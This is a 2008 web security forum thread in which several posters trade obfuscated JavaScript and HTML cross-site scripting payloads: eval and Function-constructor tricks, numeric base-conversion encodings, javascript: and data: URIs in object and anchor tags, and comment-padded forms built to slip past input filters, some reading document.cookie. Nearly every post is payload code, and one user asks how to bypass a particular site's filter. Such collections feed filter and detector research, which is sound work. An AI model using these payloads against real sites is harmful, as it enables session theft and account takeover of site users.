New XSS vectors/Unusual Javascript

Re: New XSS vectors/Unusual Javascript

Posted by: Anonymous User

Date: May 14, 2008 04:59AM

@Doc: indeed!

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: DoctorDan

Date: May 14, 2008 01:47PM

Thx! - glad you two liked the last ones.

eval(['alee','(rt(1(,))'].toString().replace(/.,./g,''))
<edits>
alternative to toString()...
eval((['alee','(rt(1(,))']+'').replace(/.,./g,''))
Simple version...
eval((['ale','rt(1)']+'').replace(/,/,''))
Whack...
top['ev'+'al'](['al','ert','(1)']['toS'+'tring']()['repl'+'ace'](/,/g,''))
</edits>

Nothing overly strange. I just didn't know that arrays could be so helpful with concatenation. When converted to a string apparently it's just a list of comma separated values. I know it's nothing new, just new to me. <edit>For that last one, I find it pretty amazing that functions/methods can be called so readily with their names expressed as strings. So many avenues for obfuscation arise. Also, simply top['ale'+'rt'](1) works too. Any keyword referring to the window object works in place of top (parent, this, self, window, top, frames, etc.). Maybe this is all commonly known, but it was a learning experience for me.</edit>

-Dan

Edited 4 time(s). Last edit at 05/15/2008 11:09PM by DoctorDan.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: May 16, 2008 09:51AM

Cool stuff Dan :D

Hehe check this:-
.0.*?1.:Script(.0.*?1.:'\134u006eame')()

*Note
Requires a payload assigned to "name", the result can be simulated like so:-
name='alert(/Chloe is gorgeous (my daughter)/)'
.0.*?1.:Script(.0.*?1.:'eval(\134u006eame)')()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Edited 1 time(s). Last edit at 05/16/2008 09:56AM by Gareth Heyes.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: May 16, 2008 10:20AM

Script(XML()..x.@y?'alert(1)':2.)()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: May 16, 2008 11:20AM

Script('/'.concat(/\
alert(1)/).concat(/ /))()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: May 20, 2008 01:17PM

Function.apply(undefined,['s','alert(s)'])(1)
Function.call(undefined,'alert(1)')()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Anonymous User

Date: June 08, 2008 09:00AM

<object data=//h4k.in>
<object data=javascript:\alert(1)>
<object data=jav&#x61script:\u0061lert(2)>
<object data=data:text/html;charset=utf-8,%3cscript%3ealert(3);%3c/script%3e>
<object data=data:text/html;,%3cscript%3ealert(4);%3c/script%3e>

Not really new but worth documenting here - inspired by ma1's recent post

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: sirdarckcat

Date: June 08, 2008 10:19AM

ff3 guys:

javascript:alert(function()1+1);

javascript:[$,_]=(function()[_ for each(_ in ["alert",eval])])(),_($)(123);

javascript:(function($)window[$.next()]($.next())(7911..toString(16)))($ for($ in {eval:1,alert:1})if($))

dude, where's my C syntax?

Anyway.. this pwns everything, and even works on IE:
javascript:window[490837..toString(1<<5)](8680439..toString(30))(580049..toString(30))

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Edited 1 time(s). Last edit at 06/08/2008 10:32AM by sirdarckcat.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: ma1

Date: June 08, 2008 11:46AM

@sirdackat:
unusual numeric base conversion are 580049, indeed :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Anonymous User

Date: June 08, 2008 01:06PM

alert(25602..toString(30)+
    ', you '+9236..toString(23,1)+
    ' way '+4.0e0000/2+' much '+192..toString(16.1)+255..toString(16.0)+238..toString(16)+
    ' recently ;)'
)

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: June 08, 2008 02:15PM

@sdc

Cool stuff :)

We'll call it base SDC

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Anonymous User

Date: June 08, 2008 03:16PM

top[(Number.MAX_VALUE/45268).toString(36).slice(15,19)]
((Number.MAX_VALUE/99808).toString(36).slice(71,76)+'("XSS")')

I kind of really start liking this ;)

Edited 1 time(s). Last edit at 06/08/2008 03:18PM by .mario.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: sirdarckcat

Date: June 09, 2008 01:46AM

A little script for making this easier:

javascript:(function(n){return (l=[i for(i in Array(11).join())].concat([String.fromCharCode(97+1*i) for(i in Array(27).join())]),d=1/(b=l.indexOf(n.split('').sort().pop())+1),r=0,[r+=l.indexOf(t)*(d*=b) for each(t in n.split('.').reverse().pop().split('').reverse())].pop());})("window")+"..toString("+b+")";

I was trying to get it to make:
window.alert
or
document.cookie

but no luck :( IEE754 precision limits suck..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: ma1

Date: June 09, 2008 03:07AM

A more compact version:

function bs(n) parseInt(n, n = n.split('').sort().pop().charCodeAt() - 86) + "..toString(" + n + ")"

alert(bs("window"))

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Edited 3 time(s). Last edit at 06/09/2008 03:15AM by ma1.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: June 09, 2008 04:16AM

@sdc @ma1

I've added it to Hackvertor, I hope you don't mind
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=Ly9Bd2Vzb21lISEhCjxAc2lyZGFyY2tjYXRfMD53aW5kb3c8QC9zaXJkYXJja2NhdF8wPg%3D%3D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: sirdarckcat

Date: June 09, 2008 08:26AM

Gareth:

You may want to put this code (or a variation of it since this one just runs on FF3):

function bs(n)((n=String(n).replace(/[^a-zA-Z0-9.-]/g,'-')).match(/^.+-|\..*\./))?[bs(x) for each(x in String(n).match(/-?[^.-]*\.?[^.-]+/g))].join('+'):'('+((n[0]=='.'?0:parseInt((n=n.toLowerCase()).split('.')[0],m=(n.match(/^[^a-z]+$/)?n.match(/[\d]/g).sort().pop()*1+1:n.match(/[a-z]/g).sort().pop().charCodeAt()-86)))+'.'+String((function(n,b){return (l=[i for(i in Array(11).join())].concat([String.fromCharCode(97+1*i) for(i in Array(27).join())]),d=1,r=0,[r+=l.indexOf(t)*(d/=b) for each(t in n.split('.').pop().split(''))].pop());})(String(n+'.').split('.')[1],m)+'.').split('.')[1])*1+').toString('+m+')';

lets see

js> x="Hello.guys-my.name-is.sdc-and.I-love.java-script"
Hello.guys-my.name-is.sdc-and.I-love.java-script
js> bs(x)
(26137359.482444316).toString(35)+(-804.6658285714286).toString(35)+(-550.9814670548197).toString(29)+(-6325.75).toString(24)+(-713710.6044712067).toString(32)+(-690865979).toString(30)
js> eval(bs(x))
hello.guys-my.name-is.sdc-and.i-love.java-script
js>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Edited 1 time(s). Last edit at 06/09/2008 08:32AM by sirdarckcat.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: DoctorDan

Date: June 11, 2008 07:48PM

[$='ale'+'rt(1)']|[_=frames['Fun'+'ction']]|_($)()

I want to play with this ridiculous stuff I see above my post as well...
-Dan

EDIT:
@SDC, amazing ideas man. I can't believe eval===self[490837['toString'](32)]

Edited 1 time(s). Last edit at 06/11/2008 08:37PM by DoctorDan.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: June 17, 2008 06:12PM

Valid JS in FF:-

default xml namespace = alert(1)

More:-

default xml namespace=(e)=eval
default xml namespace=e('alert(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Edited 1 time(s). Last edit at 06/17/2008 06:13PM by Gareth Heyes.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: guesty22

Date: July 24, 2008 07:57AM

I'm having a problem. On one site, there's a script that removes all the <script> tags, &, and converts <> into < >. Any ideas how to bypass this?

Yes I know, there can be many ways to bypass it, but nothing works from the forum :/

Edited 1 time(s). Last edit at 07/24/2008 08:02AM by guesty22.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: July 24, 2008 10:52AM

@guesty22

This thread is for new and interesting javascript/xss vectors only, please start a separate thread with your question thanks.

Try this thread:-
http://sla.ckers.org/forum/read.php?2,16443

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Edited 1 time(s). Last edit at 07/24/2008 10:53AM by Gareth Heyes.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: DoctorDan

Date: July 24, 2008 08:36PM

Oh, the strings! Imagine all the possible versions of this vector, considering the amount of ways to form strings.

blur['con'+'structor']('_','eva'+'l(_)')('a'+'lert(1)')

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: thornmaker

Date: July 24, 2008 11:06PM

good one DoctorDan. me thinks it can be turned into a phpids vector

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Kyo

Date: July 26, 2008 01:11PM

I think something like this might have been done already, but I'll post it anyway, just in case:

javascript: number = alert; eval(typeof(1))(1);

and

javascript: x = window;y=document; x.alert(y.cookie);

the x is just for the heck of it, and the y can be useful if you ever need to deal with a filter that replaces document.cookie in any variation (even with comments)

edit:
and just one more 'cause it's so much fun

javascript:b = /alert/.source; a = eval("b");; x = top["win"+"dow"];y=eval("doc_ument".replace("_",""));z = top["ev"+"al"]("y.co"+"okie"); x.alert(z);
this alerts your cookies

Edited 5 time(s). Last edit at 07/26/2008 01:32PM by Kyo.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Kyo

Date: July 27, 2008 07:07AM

window["alert"](1);
window.window.window.window.window.window.alert(2);
window["window"]["window"]["window"]["alert"](3);
window.top.window.alert(4);
this["window"]["top"]["window"]["alert"](5);
top["alert"](6);
this["alert"](7);
alert("8:"+document["cookie"]);
alert("1"["replace"]('1','9'));

I am starting to like this

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Gareth Heyes

Date: July 27, 2008 02:34PM

Yeah additive ain't it :)

See how far the rabbit hole goes...

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Kyo

Date: July 27, 2008 05:09PM

it's cool because something["something2"] magically becomes something.something2 in any case. I wonder if there are similar things. Someone should read an open source javascript engine

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: DoctorDan

Date: July 27, 2008 08:33PM

Yeah, a few of the past vectors I posted utilized that syntax. I find it very interesting using it to call methods.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Kyo

Date: July 27, 2008 09:23PM

javascript:NaN = window;eval(0/0+".alert(1)");
:D

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: DoctorDan

Date: July 28, 2008 09:47PM

Somewhat weird mime-type guess then combining url encoding with entities and unicode in JS. You can also put newlines between the first colon and the following comma. Once again, I'm not sure how much of this is new, but it does look funky.

<a href="data::,%3Cscr%69pt>%5Cu0061lert(1)</&#X00025;73cript>">XSS</a>

-Dan

EDIT, only tried it in FF3.

Edited 1 time(s). Last edit at 07/28/2008 09:48PM by DoctorDan.

Options: Reply•Quote

Re: New XSS vectors/Unusual Javascript

Posted by: Kyo

Date: July 29, 2008 05:35AM

edit: wrong thread

edit2: I might as well throw something at you, then

javascript:/**/while /**/(/**/typeof/**/ top/**/[/**/"al"/**/+/**/"ert"/**/]/*[*/(/**/1/**/)/**/)/**/break/**/;//

nothing special, just a bunch of comments and using a while loop

Edited 2 time(s). Last edit at 07/29/2008 12:06PM by Kyo.

Options: Reply•Quote